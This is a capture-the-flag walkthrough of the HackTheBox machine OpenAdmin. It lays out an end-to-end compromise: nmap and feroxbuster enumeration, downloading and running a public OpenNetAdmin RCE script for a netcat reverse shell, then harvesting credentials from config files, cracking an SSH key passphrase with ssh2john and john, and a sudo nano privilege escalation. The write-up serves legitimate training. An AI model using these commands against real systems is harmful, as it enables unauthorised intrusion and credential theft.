OpenAdmin | Config files, RSA decrypt, Sudo Nano

A number of virtual webpages being served that leads to confusion however once the "in" is discovered, the real fun begins!

by Johann Van Niekerk

OpenAdmin | Config files, RSA decrypt, Sudo Nano

Share

OpenAdmin from HackTheBox

Introduction

OpenAdmin is classed as Easy in difficulty by Hack the Box however user reporting indicates that the difficulty curve is more aligned around the Medium mark. Overall it is a great challenge as part of TJNulls list of boxes for when preparing for OSCP. The box contains web enumeration but very minor web exploitation. The entry was simply a matter of finding the "in" then discovering the web app name and version. The grunt of the work was with enumeration on the system and knowing where to look for credentials and information. The challenge was definitely in the discovery of information.

Enumeration

❯ sudo nmap -sV 10.10.10.171
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploitation

Through initial enumeration, nmap can see both port 22 and port 80 are open. SSH is typically not a vulnerable service to exploit leaving the latter port to be the destination.

www-data

From poking around within the HTTP website, it appears to be a default Apache installation page.

Running feroxbuster does return interesting directories with each entry representing it's own website.

❯ feroxbuster -n -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.171/ -x html

The first target is /music/ and while fumbling around it appears that when you hit login, then it automatically logs in as guest.

The page immediately displays the version. When looking at the browser source; it shows the webapp to be OpenNetAdmin

Knowing both the application and the version means that it is beneficial to google for exploits already known. From this; google shows a possible Remote Code Execution vulnerability using the following exploit:

OpenNetAdmin RCE

In order to use the exploit, first setting up the listener

nc -lvnp 4444

Then running the exploit:

wget https://raw.githubusercontent.com/d4t4s3c/OpenNetAdmin18.1.1RCE/main/OpenNetAdmin.sh
chmod +x ./OpenNetAdmin.sh
./OpenNetAdmin.sh $url $lhost $lport

With this we receive the reverse shell and is able to interact directly with the web server as www-data. First we want to stabilise our shell without worrying about accidental issues.

which python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo; fg
TERM=xterm

While poking around, we find a database_settings file within /opt/ona/www/local/config with the following command and get the first credentials:

find . -name *settings*.php 2>/dev/null

With the found credentials, we can look for where to use them. First we look for usernames and then test against each one. The following searches for users with a  /bin/bash shell

cat /etc/passwd |grep sh
root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

Attempting the password with jimmy ends up logged in as him!

Jimmy

As we have the Jimmy credentials, if you recall SSH was also open. So we can move from our netcat shell and log in to SSH. Poking around some more eventually doesn't uncover much so then moving on to looking at listening tcp/udp ports is a good move

netstat -auntlp

With this we find that port 52846 is running on the internal loop. We want to see what content is there and we can use SSH to portforward allowing us to access it.

#Portforward
ssh -L 1081:127.0.0.1:52846 jimmy@10.10.10.171

Now we can access the content on our local browser by visiting the following url:

After many attempts at brute forcing with common credentials; there wasn't much information to gather from this so it meant we are lacking in credentials likely still within the web server.

We know that this webpage is being hosted on the loopback address and when we accessed it, it clearly has an index page. This means we need to find the code within the web server. There is another directory called Internal that was within the /var/www folder.

When looking into it, we discover from the index.php code that the information is very similar to what we are seeing on the localhost content. This folder may represent that internal hosted content. Further down the index.php page also includes this interesting part that appears to be a sha512 hash. This is normally a difficult hash to bruteforce as it can take a lot longer to crack. So before starting up John or hashcat, it is a good idea to use some great online resources. Crackstation is a great resource that uses very large rainbow tables that has pre-matched hashes to passwords already. So it is often very beneficial to search there initially before anything else.

The good news is that when using Crackstation rainbow tables, it was able to match the hash within seconds (password blurred):

Now when going back to the internal content, we type the user: Jimmy and his password to receive the following page.

This is a RSA Private Key used with SSH. We can copy this into a file and attempt to use it to login. Copy the content from -(dash) to -(dash) and save it locally.

echo "content" > id_rsa

When attempting to login as any of the remaining users, it was asking for a passphrase. This means that the private key contains a passphrase that we don't have. In order to get this, we can attempt to crack the RSA key. First we need to convert it into a usable hash:

#Convert into a hash
/usr/share/john/ssh2john id_rsa > crackme

Then use John or hashcat to crack the file.

john crackme --wordlist=/usr/share/wordlists/rockyou.txt

After a few seconds, the passphrase was recovered! With this we can try to login to any users remaining that we know about.

Unfortunately it was not possible to login to root so attempting Joanna would be our next bet.

#SSH login with Private Key and Passphrase
ssh -i id_rsa joanna@10.10.10.171
password = $passphrase uncovered

This was a success!

Joanna

With logging in as Joanna we are able to get our first user flag.

Through general enumeration we find that Joanna can use sudo on a single command without password prompt.

sudo -l

When running the command it ends up launching a Nano file as sudo.

sudo /bin/nano /opt/priv

The first thing here is to have a look if there is information on the program within https://gtfobins.github.io. Having a look at GTFO bins shows how nano can be used for shell escapes:

And with that we are root and able to get the root flag.

Root

Final Word

The box is one a TJNulls list of OSCP-like boxes and it definitely lives up to it in terms of the information gathering while on target. While the box is classed as an Easy box by Hack The Box; the user-reporting was that it was more of a medium difficulty box. The exploits were great and not particularly difficult to discover however the information gathering was the key focus on this box.